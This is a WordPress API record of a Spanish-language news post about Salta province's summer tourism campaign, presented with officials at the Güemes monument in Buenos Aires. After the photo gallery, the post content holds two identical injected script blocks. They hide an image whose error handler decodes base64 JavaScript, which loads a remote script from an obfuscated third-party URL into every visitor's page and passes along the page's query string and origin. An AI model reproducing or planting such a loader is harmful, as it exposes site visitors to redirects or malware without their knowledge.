{"id":1866,"date":"2022-11-29T12:34:26","date_gmt":"2022-11-29T15:34:26","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1866"},"modified":"2025-08-14T00:29:09","modified_gmt":"2025-08-14T03:29:09","slug":"autentica-presentacion-de-salta-de-su-temporada-de-verano","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1866","title":{"rendered":"Aut\u00e9ntica presentaci\u00f3n de Salta de su temporada de verano"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#8e0c2d\"><em>La campa\u00f1a \u201cSalta una receta que no falla\u00bb fue presentada a medios de prensa, influencers e invitados en una puesta esc\u00e9nica original en el monumento a G\u00fcemes en la ciudad de Buenos Aires.<\/em><\/h4>\n\n\n\n<p>El Ministerio de Turismo y Deportes de Salta nuevamente sorprendi\u00f3 con una muestra original de su oferta tur\u00edstica, en esta oportunidad el motivo fue presentar para el pa\u00eds la campa\u00f1a de verano.<br>&nbsp;<br>\u201cSalta una receta que no falla\u00bb es el nombre de la campa\u00f1a con la que se convoca a turistas de los diversos mercados a vivir sus experiencias del verano en la provincia a trav\u00e9s de nuestra cultura, lo mejor de nuestra gastronom\u00eda, fusionada con los mejores paisajes y maridados con los vinos de altura.<br>&nbsp;<br>En el monumento a G\u00fcemes de la ciudad de Buenos Aires la experiencia de lo que pueden encontrar en Salta la vivieron periodistas, influencers e invitados especiales mediante una puesta en escena al aire libre que despert\u00f3 la atenci\u00f3n por su originalidad.<br>&nbsp;<br>&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5051-autentica-presentacion-de-salta-de-su-temporada-de-verano-20221129145946.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/5051-autentica-presentacion-de-salta-de-su-temporada-de-verano-20221129145946.jpg\" alt=\"Aut\u00e9ntica presentaci\u00f3n de Salta de su temporada de verano\"\/><\/a><\/figure>\n\n\n\n<p>\u201cUna receta que no falla resume nuestro dec\u00e1logo de comunicaci\u00f3n orientado a nuestros mercados estrat\u00e9gicos\u201d, indic\u00f3 la secretaria de Turismo de Salta,&nbsp;<strong>Nadia Loza&nbsp;<\/strong>quien destac\u00f3 aspectos claves como la cultura, gastronom\u00eda y la hospitalidad del salte\u00f1o, \u201cen el verano potenciadas con experiencias de aventura para todas las edades y segmentos en entornos naturales \u00fanicos \u201c.<br>&nbsp;<br>Dentro de las actividades fueron resaltadas dos experiencias en productos Marca Pa\u00eds que tiene Salta un sello nacional que identifica a la Argentina en el mundo, como son el ic\u00f3nico Tren a las Nubes y el Telef\u00e9rico San Bernardo que en diciembre cumple 35 a\u00f1os de servicio.<br>&nbsp;<br>Tambi\u00e9n estuvo presente la subsecretaria de Promoci\u00f3n de Salta<em>&nbsp;Laura Alcorta<\/em>&nbsp;y la directora de Promoci\u00f3n Estrat\u00e9gica del Ministerio de Turismo de la Naci\u00f3n&nbsp;<strong>Romina Sorrentino<\/strong>, de cuya \u00e1rea depende la distinci\u00f3n Marca Pa\u00eds.&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"900\" height=\"600\" data-id=\"1867\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1977-autentica-presentacion-de-salta-de-su-temporada-de-verano.jpg\" alt=\"\" class=\"wp-image-1867\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1977-autentica-presentacion-de-salta-de-su-temporada-de-verano.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1977-autentica-presentacion-de-salta-de-su-temporada-de-verano-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1977-autentica-presentacion-de-salta-de-su-temporada-de-verano-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1977-autentica-presentacion-de-salta-de-su-temporada-de-verano-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1977-autentica-presentacion-de-salta-de-su-temporada-de-verano-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"900\" height=\"600\" data-id=\"1868\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1978-autentica-presentacion-de-salta-de-su-temporada-de-verano.jpg\" alt=\"\" class=\"wp-image-1868\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1978-autentica-presentacion-de-salta-de-su-temporada-de-verano.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1978-autentica-presentacion-de-salta-de-su-temporada-de-verano-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1978-autentica-presentacion-de-salta-de-su-temporada-de-verano-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1978-autentica-presentacion-de-salta-de-su-temporada-de-verano-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1978-autentica-presentacion-de-salta-de-su-temporada-de-verano-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"900\" height=\"600\" data-id=\"1869\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1979-autentica-presentacion-de-salta-de-su-temporada-de-verano.jpg\" alt=\"\" class=\"wp-image-1869\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1979-autentica-presentacion-de-salta-de-su-temporada-de-verano.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1979-autentica-presentacion-de-salta-de-su-temporada-de-verano-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1979-autentica-presentacion-de-salta-de-su-temporada-de-verano-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1979-autentica-presentacion-de-salta-de-su-temporada-de-verano-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1979-autentica-presentacion-de-salta-de-su-temporada-de-verano-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"900\" height=\"600\" data-id=\"1871\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1980-autentica-presentacion-de-salta-de-su-temporada-de-verano-20221129150508.jpg\" alt=\"\" class=\"wp-image-1871\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1980-autentica-presentacion-de-salta-de-su-temporada-de-verano-20221129150508.jpg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1980-autentica-presentacion-de-salta-de-su-temporada-de-verano-20221129150508-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1980-autentica-presentacion-de-salta-de-su-temporada-de-verano-20221129150508-768x512.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1980-autentica-presentacion-de-salta-de-su-temporada-de-verano-20221129150508-696x464.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1980-autentica-presentacion-de-salta-de-su-temporada-de-verano-20221129150508-630x420.jpg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"899\" height=\"600\" data-id=\"1870\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1981-autentica-presentacion-de-salta-de-su-temporada-de-verano.jpg\" alt=\"\" class=\"wp-image-1870\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1981-autentica-presentacion-de-salta-de-su-temporada-de-verano.jpg 899w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1981-autentica-presentacion-de-salta-de-su-temporada-de-verano-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1981-autentica-presentacion-de-salta-de-su-temporada-de-verano-768x513.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1981-autentica-presentacion-de-salta-de-su-temporada-de-verano-696x465.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1981-autentica-presentacion-de-salta-de-su-temporada-de-verano-629x420.jpg 629w\" sizes=\"(max-width: 899px) 100vw, 899px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"899\" height=\"600\" data-id=\"1872\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1982-autentica-presentacion-de-salta-de-su-temporada-de-verano.jpg\" alt=\"\" class=\"wp-image-1872\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1982-autentica-presentacion-de-salta-de-su-temporada-de-verano.jpg 899w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1982-autentica-presentacion-de-salta-de-su-temporada-de-verano-300x200.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1982-autentica-presentacion-de-salta-de-su-temporada-de-verano-768x513.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1982-autentica-presentacion-de-salta-de-su-temporada-de-verano-696x465.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1982-autentica-presentacion-de-salta-de-su-temporada-de-verano-629x420.jpg 629w\" sizes=\"(max-width: 899px) 100vw, 899px\" \/><\/figure>\n<\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La campa\u00f1a \u201cSalta una receta que no falla\u00bb fue presentada a medios de prensa, influencers e invitados en una puesta esc\u00e9nica original en el monumento a G\u00fcemes en la ciudad de Buenos Aires. El Ministerio de Turismo y Deportes de Salta nuevamente sorprendi\u00f3 con una muestra original de su oferta tur\u00edstica, en esta oportunidad el [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1873,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,17],"tags":[],"class_list":{"0":"post-1866","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1866"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1866"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1866\/revisions"}],"predecessor-version":[{"id":7260,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1866\/revisions\/7260"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1873"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1866"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1866"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1866"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}